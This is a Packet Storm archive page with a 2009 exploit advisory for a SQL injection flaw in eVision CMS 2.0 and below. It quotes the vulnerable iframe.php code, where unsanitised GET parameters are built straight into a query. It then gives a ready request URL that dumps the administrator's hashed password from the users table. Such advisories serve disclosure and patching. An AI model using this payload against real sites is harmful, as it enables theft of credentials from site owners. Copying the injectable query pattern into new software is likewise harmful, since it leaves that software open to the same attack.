what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eVision CMS 2.0 SQL Injection

eVision CMS 2.0 SQL Injection
Posted Jan 30, 2009
Authored by darkjoker | Site darkjokerside.altervista.org

eVision CMS versions 2.0 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 9c8d713c7c35a06064f7bf6581fe29cc3b13eb24149ab46c58068d0d87aa92a0

eVision CMS 2.0 SQL Injection

Change Mirror Download
--+++============================================================+++--
--+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++--
--+++============================================================+++--

[+] Author : darkjoker
[+] Site : http://darkjoker.net23.net
[+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz

[+] Vulnerable code:

67 $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";
68 $result = mysql_query($sql);
69 $row = mysql_fetch_array($result);
70
71 if ( isset($_GET['div']) ) { $div = 'class="'.$_GET['div'].'"'; }
72 else { $div = ''; }
73 if ( isset($_GET['font']) ) { $font = 'class="'.$_GET['font'].'"'; }
74 else { $font = ''; }
75
76 echo '
77 <html '.$div.'>
78 <head>
79 <meta http-equiv="Content-Type" content="text/html; charset='.$charset.'">
80 <link rel="stylesheet" type="text/css" href="'.$path.'style.php?template='.$template.'&module='.$_GET['module'].'">
81 </head>
82 <body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0" '.$font.'>'.set_text($row[$_GET['field']]).'</body>
83 </html>
84 ';


[+] It prints admin's password (hashed):

[+] /iframe.php?field=pass&module=users&id=1

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close